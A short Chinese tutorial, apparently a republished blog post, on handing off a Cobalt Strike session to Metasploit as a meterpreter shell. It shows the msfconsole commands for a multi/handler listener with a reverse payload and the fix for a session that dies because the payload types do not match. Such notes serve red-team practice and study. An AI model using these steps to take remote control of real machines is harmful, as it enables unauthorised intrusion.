cs派生msf shell


msf5 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set payload  windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

然后把主機和端口設置好。

選中需要派生shell的主機右鍵spawn。選擇我們設置好的foreign http監聽器。然后點擊choose

這個時候會msf會派生出一個seesion,但是過一會並沒有出現metepreter shell,而是顯示
Meterpreter session 4 closed. Reason: Died,這是因為cs和msf設置的payload 模塊不一樣,cs設置的payload是windows/foreign/reverse_http,但是msf這邊設置的是windows/foreign/reverse_tcp。

我們現在修改msf設置的payload為window/foreign/reverse_http,再次從cs派生shell。可以拿到meterpreter shell。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM